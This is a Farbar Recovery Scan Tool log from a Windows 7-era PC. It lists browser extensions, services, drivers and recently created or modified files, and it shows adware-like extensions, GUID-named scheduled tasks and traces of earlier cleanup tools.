FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2014-05-06]
FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2014-05-06]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14]
FF HKLM\...\Firefox\Extensions: [fiddlerhook@fiddler2.com] - C:\Program Files\Fiddler2\FiddlerHook
FF Extension: FiddlerHook - C:\Program Files\Fiddler2\FiddlerHook [2013-04-11]
FF HKLM\...\Firefox\Extensions: [ext@zipenhancer.com] - C:\Program Files\AmiExt\ZipEnhancer\ff
FF HKLM\...\Firefox\Extensions: [ext@WebexpEnhancedV1alpha26.net] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ff
FF HKLM\...\Firefox\Extensions: [ext@VideoPlayerV3beta10835.net] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaPlayerV1alpha583.net] - C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaViewerV1alpha442.net] - C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaViewV1alpha678.net] - C:\Program Files\MediaViewV1\MediaViewV1alpha678\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaWatchV1home1288.net] - C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaBuzzV1mode6898.net] - C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ff
FF HKLM\...\Firefox\Extensions: [ext@RichMediaViewV1release335.net] - C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ff
FF HKLM\...\Thunderbird\Extensions: [avgthb@avg.com] - C:\Program Files\AVG\AVG2012\Thunderbird
FF Extension: AVG E-mail Scanner - C:\Program Files\AVG\AVG2012\Thunderbird [2012-02-05]
FF HKCU\...\Firefox\Extensions: [wcapturex@deskperience.com] - C:\Program Files\WordWeb\WCaptureMoz
FF Extension: WordWeb one-click lookup - C:\Program Files\WordWeb\WCaptureMoz [2013-10-09]
FF HKCU\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]
FF Extension: Free Download Manager plugin - C:\ProgramData\Free Download Manager\Firefox\Extensions\1.6.0.7 [2014-05-13]
 
Chrome: 
=======
CHR HomePage: https://mysearch.avg.com?cid={A268649E-F1D3-473A-AE97-6729BD526C4B}&mid=47df76ff41b147d1a1eebd2b2b200a65-d3ca194806898021664af9d7b88cd3bb6abd1c35&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2014-08-01 17:57:47&v=3.1.0.6&pid=wtu&sg=&sap=hp
CHR StartupUrls: "https://mysearch.avg.com?cid={A268649E-F1D3-473A-AE97-6729BD526C4B}&mid=47df76ff41b147d1a1eebd2b2b200a65-d3ca194806898021664af9d7b88cd3bb6abd1c35&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2014-08-01 17:57:47&v=3.1.0.6&pid=wtu&sg=&sap=hp"
CHR DefaultSearchKeyword: mysearch.avg.com
CHR DefaultSearchURL: https://mysearch.avg.com/search?cid={A268649E-F1D3-473A-AE97-6729BD526C4B}&mid=47df76ff41b147d1a1eebd2b2b200a65-d3ca194806898021664af9d7b88cd3bb6abd1c35&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2014-08-01 17:57:47&v=3.1.0.6&pid=wtu&sg=&sap=dsp&q={searchTerms}
CHR Extension: (Google Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-08]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-01-04]
CHR Extension: (JSON Formatter) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcjindcccaagfpapjjmafapmmgkkhgoa [2014-03-10]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-04]
CHR Extension: (JSONView) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\chklaanhfefbnpoihckbnefhakgolnmc [2014-03-11]
CHR Extension: (Google Search) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-01-04]
CHR Extension: (Web Developer Checklist) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\iahamcpedabephpcgkeikbclmaljebjp [2014-03-11]
CHR Extension: (Page Ruler) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlpkojjdgbllmedoapgfodplfhcbnbpn [2014-02-14]
CHR Extension: (Skype Click to Call) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2013-10-08]
CHR Extension: (AVG Web TuneUp) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2014-08-01]
CHR Extension: (Google Wallet) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-04]
CHR Extension: (RSS Feed Reader) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnjaodmkngahhkoihejjehlcdlnohgmp [2014-07-04]
CHR HKLM\...\Chrome\Extension: [amjjmamomegdbncpbjpdnhgjmgkcbgnk] - C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ch\RichMediaViewV1release335.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [bdmfpinehligogbigdemhilfkfpkccfm] - C:\Program Files\MediaViewV1\MediaViewV1alpha678\ch\MediaViewV1alpha678.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [bmbbghopkonbdcikinngeajoadgjbnek] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ch\WebexpEnhancedV1alpha26.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [empgnenkbgnjnappgnfbajalmniplfjp] - C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ch\MediaWatchV1home1288.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [ghbojfndgbbkbhfnadfapnbdfcifhhac] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ch\VideoPlayerV3beta10835.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [kbanbanalocifhgjcppngcdgminjckhm] - C:\Program Files\AmiExt\ZipEnhancer\ch\ZipEnhancer.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14]
CHR HKLM\...\Chrome\Extension: [lnaijfakkpgehldbggdgddehlbaabegk] - C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ch\MediaBuzzV1mode6898.crx [2014-07-14]
CHR HKLM\...\Chrome\Extension: [mjdepfkicdcciagbigfcmdhknnoaaegf] - C:\Program Files\WordWeb\wcxChrome.crx [2013-10-09]
CHR HKLM\...\Chrome\Extension: [pacgpkgadgmibnhpdidcnfafllnmeomc] - C:\Users\User\AppData\Local\Temp\ccex.crx [2013-10-09]
CHR HKLM\...\Chrome\Extension: [phcbpehkodokopeahopmbnclocbkedfd] - C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ch\MediaViewerV1alpha442.crx [2013-10-09]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AVGIDSAgent; C:\Program Files\AVG\AVG2014\avgidsagent.exe [3241488 2014-06-27] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2014\avgwdsvc.exe [289328 2014-06-17] (AVG Technologies CZ, s.r.o.)
R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
S4 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2014-07-31] (Macrovision Europe Ltd.) [File not signed]
R2 ftpsvc; C:\Windows\system32\inetsrv\ftpsvc.dll [308224 2009-07-14] (Microsoft Corporation)
S3 fussvc; C:\Program Files\Windows Kits\8.0\App Certification Kit\fussvc.exe [133632 2014-07-31] (Microsoft Corporation) [File not signed]
R2 IISADMIN; C:\Windows\system32\inetsrv\inetinfo.exe [13824 2009-07-14] (Microsoft Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 MongoDB; D:\wamp\bin\mongodb\mongodb-win32-i386-2.4.5\bin\mongod.exe [11314688 2014-07-31] () [File not signed]
R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [31256 2008-07-10] (Microsoft Corporation)
R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [40999448 2008-07-10] (Microsoft Corporation)
S4 NetMsmqActivator; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S4 NetPipeActivator; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S4 NetTcpActivator; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S4 NetTcpPortSharing; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [369688 2008-07-10] (Microsoft Corporation)
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 Te.Service; C:\Program Files\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [94208 2014-07-31] (Microsoft Corporation) [File not signed]
R2 VisualSVNServer; C:\Program Files\VisualSVN Server\bin\VisualSVNServer.exe [24208 2014-06-10] (Apache Software Foundation)
S3 vrepocfgsvc; C:\Program Files\VisualSVN Server\bin\vrepocfgsvc.exe [122000 2014-06-10] (VisualSVN Ltd.)
R2 vToolbarUpdater3.1.0; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\ToolbarUpdater.exe [1814040 2014-08-01] (AVG Secure Search)
R2 wampapache; D:\wamp\bin\apache\apache2.2.17\bin\httpd.exe [20549 2010-12-31] (Apache Software Foundation) [File not signed]
R2 wampmysqld; D:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe [8133120 2010-12-31] () [File not signed]
R2 postgresql-9.2; C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N "postgresql-9.2" -D "C:/Program Files/PostgreSQL/9.2/data" -w [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 ASPI32; C:\Windows\system32\Drivers\ASPI32.sys [16877 2002-07-17] (Adaptec) [File not signed]
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [199960 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [188696 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [241944 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [197400 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-01] (AVG Technologies)
S4 RsFx0102; C:\Windows\System32\DRIVERS\RsFx0102.sys [242712 2008-07-10] (Microsoft Corporation)
S3 VSPerfDrv110; C:\Program Files\Microsoft Visual Studio 11.0\Team Tools\Performance Tools\VSPerfDrv110.sys [55416 2012-07-13] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-04 10:29 - 2014-08-04 13:50 - 00000000 ____D () C:\FRST
2014-08-04 10:09 - 2014-08-04 10:10 - 06004615 _____ (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.2_win32-setup.exe
2014-08-03 11:28 - 2014-08-03 11:28 - 00000000 ____D () C:\Windows\system32\%LOCALAPPDATA%
2014-08-03 11:22 - 2014-08-03 11:22 - 00000000 ____D () C:\Windows\system32\cache
2014-08-01 17:57 - 2014-08-03 11:18 - 00000000 ____D () C:\ProgramData\AVG Security Toolbar
2014-08-01 17:57 - 2014-08-01 18:05 - 00000000 ____D () C:\Users\User\AppData\Local\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\Common Files\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:56 - 00042784 _____ (AVG Technologies) C:\Windows\system32\Drivers\avgtpx86.sys
2014-08-01 12:48 - 2014-08-01 12:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-07-31 17:37 - 2014-07-31 17:37 - 00002121 _____ () C:\Users\User\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-07-31 17:37 - 2014-07-31 17:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-31 17:36 - 2014-07-31 17:36 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-07-31 16:44 - 2014-07-31 16:44 - 00001163 _____ () C:\Users\Public\Desktop\Navicat Premium.lnk
2014-07-31 13:10 - 2014-07-31 13:10 - 00000000 ____D () C:\Users\User\AppData\Roaming\AVG2014
2014-07-31 13:06 - 2014-07-31 13:06 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\Users\User\AppData\Roaming\TuneUp Software
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-07-31 13:04 - 2014-07-31 13:26 - 00000000 ____D () C:\ProgramData\AVG2014
2014-07-31 13:00 - 2014-07-31 13:26 - 00000000 ____D () C:\Users\User\AppData\Local\Avg2014
2014-07-31 13:00 - 2014-07-31 13:00 - 00000000 ____D () C:\Users\User\AppData\Local\MFAData
2014-07-31 11:36 - 2014-07-31 11:36 - 00000000 ____D () C:\Qoobox
2014-07-31 11:35 - 2014-07-31 11:36 - 00000000 ___SD () C:\32788R22FWJFW
2014-07-31 11:35 - 2014-07-31 11:35 - 00000000 ____D () C:\Windows\erdnt
2014-07-30 16:01 - 2014-07-31 10:18 - 00000000 ____D () C:\AdwCleaner
2014-07-30 15:11 - 2014-07-30 15:11 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-07-30 15:06 - 2014-07-30 15:06 - 00776976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys.1406712158422
2014-07-30 15:06 - 2014-07-30 15:06 - 00411552 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys.1406712158422
2014-07-30 15:03 - 2014-07-31 11:38 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-07-30 14:46 - 2014-07-30 14:50 - 00004088 _____ () C:\Users\User\Desktop\Rkill.txt
2014-07-30 09:20 - 2014-07-30 09:20 - 00000687 _____ () C:\awhE80D.tmp
2014-07-29 16:50 - 2014-07-29 16:50 - 00000687 _____ () C:\awhF508.tmp
2014-07-29 13:32 - 2014-08-04 13:47 - 00026497 _____ () C:\Windows\WindowsUpdate.log
2014-07-29 12:35 - 2014-07-29 12:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2014-07-29 10:51 - 2014-07-29 10:51 - 00000687 _____ () C:\awhDFF2.tmp
2014-07-29 09:15 - 2014-07-29 09:15 - 00000687 _____ () C:\awhE5AC.tmp
2014-07-28 15:09 - 2014-07-28 15:09 - 00000687 _____ () C:\awhE446.tmp
2014-07-28 15:00 - 2014-07-28 15:00 - 00000000 ____D () C:\Windows\pss
2014-07-28 14:49 - 2014-07-28 14:49 - 00000687 _____ () C:\awhE040.tmp
2014-07-28 14:44 - 2014-07-31 11:38 - 00338870 _____ () C:\Windows\PFRO.log
2014-07-28 14:12 - 2014-07-28 14:12 - 00000687 _____ () C:\awh4D83.tmp
2014-07-28 14:07 - 2014-08-04 13:41 - 00002152 _____ () C:\Windows\setupact.log
2014-07-28 14:07 - 2014-07-28 14:07 - 00000000 _____ () C:\Windows\setuperr.log
2014-07-28 11:43 - 2014-07-28 11:43 - 00000000 ____D () C:\Users\User\Documents\iTools
2014-07-28 11:18 - 2014-07-28 11:18 - 00199672 _____ () C:\Users\User\Documents\cc_20140728_111739.reg
2014-07-28 11:11 - 2014-07-28 11:11 - 00000969 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\Program Files\CCleaner
2014-07-28 09:23 - 2014-07-28 09:23 - 00000687 _____ () C:\awhE9F0.tmp
2014-07-25 17:58 - 2014-07-25 17:58 - 00000687 _____ () C:\awhF150.tmp
2014-07-25 16:50 - 2014-08-04 13:50 - 00001460 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00002190 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001528 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001524 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001422 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001406 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001334 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001246 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10.job
2014-07-25 16:49 - 2014-08-04 13:42 - 00000584 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11.job
2014-07-25 16:46 - 2014-07-28 10:09 - 00000000 ____D () C:\Users\User\AppData\Local\1682
2014-07-25 16:34 - 2014-08-04 13:42 - 00001426 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user.job
2014-07-25 16:34 - 2014-08-04 13:42 - 00001410 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5.job
2014-07-25 16:34 - 2014-08-04 13:42 - 00001252 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10.job
2014-07-25 16:34 - 2014-07-28 15:01 - 00000000 ____D () C:\Program Files\Bulk Rename Utility
2014-07-25 16:33 - 2014-08-04 13:42 - 00002002 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001528 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001524 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001460 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001316 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00000588 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11.job
2014-07-25 14:44 - 2014-07-25 14:46 - 05981830 ____N (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.1_win32-setup.exe
2014-07-25 09:16 - 2014-07-25 09:16 - 00000687 _____ () C:\awhE954.tmp
2014-07-24 11:25 - 2014-08-01 13:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VisualSVN
2014-07-24 11:25 - 2014-08-01 13:40 - 00000000 ____D () C:\Program Files\VisualSVN Server
2014-07-24 09:13 - 2014-07-24 09:13 - 00000687 _____ () C:\awhDC4A.tmp
2014-07-23 09:25 - 2014-07-23 09:25 - 00000687 _____ () C:\awhDDEF.tmp
2014-07-22 18:23 - 2014-07-22 18:23 - 00000000 ____D () C:\Users\User\Documents\Toad Data Modeler
2014-07-22 15:53 - 2014-07-22 18:54 - 00000000 ____D () C:\Users\User\AppData\Roaming\DBDesigner4
2014-07-22 15:22 - 2014-07-22 15:22 - 00000687 _____ () C:\awhE1D6.tmp
2014-07-22 09:24 - 2014-07-22 09:24 - 00000687 _____ () C:\awhE465.tmp
2014-07-21 09:21 - 2014-07-21 09:21 - 00000687 _____ () C:\awhDBEC.tmp
2014-07-18 09:16 - 2014-07-18 09:16 - 00000687 _____ () C:\awhDCA8.tmp
2014-07-16 09:17 - 2014-07-16 09:17 - 00000687 _____ () C:\awhD8A2.tmp
2014-07-15 09:16 - 2014-07-15 09:16 - 00000687 _____ () C:\awhD9F9.tmp
2014-07-14 09:26 - 2014-07-14 09:26 - 00000687 _____ () C:\awhD9CA.tmp
2014-07-11 18:22 - 2014-08-01 11:57 - 00000000 ____D () C:\Users\User\Desktop\maintainance
2014-07-11 09:08 - 2014-07-11 09:08 - 00000687 _____ () C:\awhDCF6.tmp
2014-07-10 11:51 - 2014-07-10 11:51 - 00000804 _____ () C:\Users\User\out.sql
2014-07-10 10:09 - 2014-07-10 10:09 - 00000687 _____ () C:\awhDA18.tmp
2014-07-10 09:15 - 2014-07-10 09:15 - 00000687 _____ () C:\awhDC88.tmp
2014-07-09 09:14 - 2014-07-09 09:14 - 00000687 _____ () C:\awhDCD6.tmp
2014-07-08 09:22 - 2014-07-08 09:22 - 00000687 _____ () C:\awhE0EC.tmp
2014-07-07 09:25 - 2014-07-07 09:25 - 00000687 _____ () C:\awhD74B.tmp
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-04 13:50 - 2014-08-04 10:29 - 00000000 ____D () C:\FRST
2014-08-04 13:50 - 2014-07-25 16:50 - 00001460 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7.job
2014-08-04 13:47 - 2014-07-29 13:32 - 00026497 _____ () C:\Windows\WindowsUpdate.log
2014-08-04 13:46 - 2011-06-10 22:46 - 00000000 ____D () C:\Users\User\AppData\Roaming\Skype
2014-08-04 13:44 - 2012-01-10 15:00 - 00000000 ____D () C:\Users\User\AppData\Roaming\Dropbox
2014-08-04 13:44 - 2009-07-14 08:22 - 00000000 ____D () C:\Windows\system32\inetsrv
2014-08-04 13:43 - 2011-11-17 13:58 - 00000000 ____D () C:\Users\User\AppData\Local\TSVNCache
2014-08-04 13:42 - 2014-07-25 16:50 - 00002190 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001528 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001524 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001422 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001406 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001334 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001246 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10.job
2014-08-04 13:42 - 2014-07-25 16:49 - 00000584 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11.job
2014-08-04 13:42 - 2014-07-25 16:34 - 00001426 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user.job
2014-08-04 13:42 - 2014-07-25 16:34 - 00001410 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5.job
2014-08-04 13:42 - 2014-07-25 16:34 - 00001252 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00002002 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001528 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001524 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001460 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001316 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00000588 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11.job
2014-08-04 13:42 - 2013-10-08 10:27 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-04 13:42 - 2013-06-20 11:49 - 00000492 _____ () C:\Windows\Tasks\SDMsgUpdate (SD).job
2014-08-04 13:41 - 2014-07-28 14:07 - 00002152 _____ () C:\Windows\setupact.log
2014-08-04 13:41 - 2009-07-14 10:38 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-04 13:34 - 2012-04-08 09:26 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
